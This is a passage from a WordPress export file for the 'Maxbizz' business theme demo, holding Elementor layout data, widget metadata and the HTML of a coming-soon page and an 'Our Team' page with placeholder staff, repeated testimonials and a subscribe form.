		<wp:meta_value><![CDATA[[{"id":"f1dbf06","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/coming-soon.jpg","id":607},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","height":"full","content_position":"middle","vlines_class":"","vnumber_line":"no-lines-vertical-center","vzindex":"","vline1_color":"","vline2_color":"","vline3_color":"","hlines_class":"","hnumber_line":"both","hzindex":"","hline1_color":"","hline2_color":""},"elements":[{"id":"65f2915","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"adfe967","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04_Black.svg","id":383},"image_size":"full","image_custom_dimension":{"width":"80","height":"80"},"width":{"unit":"px","size":140,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"120","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"link_to":"custom","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz-business\/","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"image"},{"id":"32c523f","elType":"widget","settings":{"title":"Maxbizz is in the Works!","align":"center","typography_typography":"custom","typography_font_size":{"unit":"px","size":51,"sizes":[]},"typography_line_height":{"unit":"px","size":110,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":42,"sizes":[]},"typography_line_height_mobile":{"unit":"px","size":55,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"title_color":"#1A1A1A","typography_font_weight":"700"},"elements":[],"widgetType":"heading"},{"id":"df3cd75","elType":"widget","settings":{"day":"Day","hour":"Hour","min":"Minute","second":"Second","days":"Days","hours":"Hours","mins":"Minutes","seconds":"Seconds","_padding":{"unit":"px","top":"0","right":"0","bottom":"90","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"date":"2021-11-20 12:00","number_typography_typography":"custom","number_typography_font_family":"Open Sans","number_typography_font_weight":"600"},"elements":[],"widgetType":"icountdown"},{"id":"2c42310","elType":"widget","settings":{"editor":"<p>We are about to go live so watch this space!<\/p>","align":"center","typography_typography":"custom","typography_font_size":{"unit":"px","size":18,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":15,"sizes":[]},"text_color":"#555555","typography_font_family":"Inter"},"elements":[],"widgetType":"text-editor"},{"id":"5507345","elType":"widget","settings":{"cf7":"610","_padding":{"unit":"px","top":"0","right":"0","bottom":"115","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"ictf7"},{"id":"880944e","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"columns":"4"},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:8:{s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:1;s:10:"image_size";i:1;s:22:"image_custom_dimension";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:5:"width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:1;s:5:"align";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:7:{s:21:"typography_typography";i:1;s:20:"typography_font_size";i:1;s:22:"typography_line_height";i:1;s:27:"typography_font_size_mobile";i:1;s:29:"typography_line_height_mobile";i:1;s:11:"title_color";i:1;s:22:"typography_font_weight";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:10:"icountdown";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}s:7:"content";a:1:{s:15:"content_section";a:1:{s:4:"date";i:1;}}s:5:"style";a:1:{s:21:"style_content_section";a:3:{s:28:"number_typography_typography";i:1;s:29:"number_typography_font_family";i:1;s:29:"number_typography_font_weight";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:6:{s:5:"align";i:1;s:21:"typography_typography";i:1;s:20:"typography_font_size";i:1;s:27:"typography_font_size_mobile";i:1;s:10:"text_color";i:1;s:22:"typography_font_family";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:1;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:2:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_mobile";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"section_background";a:5:{s:21:"background_background";i:1;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;}}s:6:"layout";a:1:{s:14:"section_layout";a:2:{s:6:"height";i:1;s:16:"content_position";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Team</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/our-team/</link>
		<pubDate>Wed, 09 Sep 2020 09:37:48 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=690</guid>
		<description></description>
		<content:encoded><![CDATA[our team	        <h3>Our Skilled Leaders</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team1-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Monica Black</h6>				chief communication officer			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team2.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team2-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Peter Perish</h6>				chief business project			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team3.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team3-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Olivia Woodson</h6>				international consultant			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team4.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team4-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Peter Adams</h6>				co-founder of company			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team5.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team5.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team5-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Mary Flynn</h6>				CHIEF TECHNOLOGY OFFICER			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team6.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team6.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team6-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Adam Oswald</h6>				CHIEF MARKETING OFFICER			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team7.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team7.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team7-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Kate Green</h6>				CHIEF FINANCIAL OFFICER			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team8.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team8.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team8-1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Harry Septem</h6>				co-founder of company			
	        our benefits	        <h2>Entrust Your Project to  Our Specialists</h2>	    
		<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.</p>		
	        <h6>marketing analysis</h6>			
	        <h6>finance strategy</h6>			
	        <h6>business innovation</h6>			
										<img width="959" height="650" src="https://maxbizz.s3.amazonaws.com/images/image1-team.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/image1-team.jpg 959w, https://maxbizz.s3.amazonaws.com/images/image1-team-1-300x203.jpg 300w, https://maxbizz.s3.amazonaws.com/images/image1-team-1-768x521.jpg 768w" sizes="(max-width: 959px) 100vw, 959px" />											
	        testimonials	        <h3>What People Say About Us</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
							<h6>Oliver Simson</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
							<h6>Mary Grey</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
							<h6>Samanta Fox</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
							<h6>Oliver Simson</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
							<h6>Mary Grey</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
							<h6>Samanta Fox</h6>							client of company						
										<img src="https://maxbizz.s3.amazonaws.com/images/04_Full_White.svg" alt="" loading="lazy" />											
<p role="status" aria-live="polite" aria-atomic="true"></p> <ul></ul>
<form action="/maxbizz-corporate/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741" />
<input type="hidden" name="_wpcf7_version" value="5.3.2" />
<input type="hidden" name="_wpcf7_locale" value="en_US" />
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1" />
<input type="hidden" name="_wpcf7_container_post" value="0" />
<input type="hidden" name="_wpcf7_posted_data_hash" value="" />
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *" /><br />
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *" /><br />
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>690</wp:post_id>
		<wp:post_date><![CDATA[2020-09-09 09:37:48]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-09 09:37:48]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-team]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"c0972f9","elType":"section","settings":{"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"120","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"a497b47","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"851ebdc","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"5cea06f","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"3c8329c","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"d1c3196","elType":"widget","settings":{"sub":"our team","title":"Our Skilled Leaders","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#95A2AC","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"e34f121","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"051be26","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"4dda4d5","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"7893ae6","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2bcb443","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team1.jpg","id":524},"member_name":"Monica Black","member_extra":"chief communication officer","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":13,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"c6f2cd2","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"3045fbb","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team2.jpg","id":525},"member_name":"Peter Perish","member_extra":"chief business project","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":13,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"05a209e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2585422","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team3.jpg","id":526},"member_name":"Olivia Woodson","member_extra":"international consultant","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":13,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"3f0bea3","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"659956f","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team4.jpg","id":527},"member_name":"Peter Adams","member_extra":"co-founder of company","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":13,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true}],"isInner":true},{"id":"b1c7f19","elType":"section","settings":{"gap":"extended","structure":"40","layout":"full_width"},"elements":[{"id":"419a6b1","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"65aaf12","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team5.jpg","id":694},"member_name":"Mary Flynn","member_extra":"CHIEF TECHNOLOGY OFFICER","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":13,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"2b58641","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"23fa50d","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team6.jpg","id":695},"member_name":"Adam Oswald","member_extra":"CHIEF MARKETING OFFICER","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":13,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"42171b0","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"1c6c26d","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team7.jpg","id":696},"member_name":"Kate Green","member_extra":"CHIEF FINANCIAL OFFICER","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":22,"sizes":[]},"job_typography_typography":"custom","job_typography_font_size":{"unit":"px","size":13,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"23f0a2f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"df675fc","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team8.jpg","id":697},"member_name":"Harry Septem","member_extra":"co-founder of company","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab 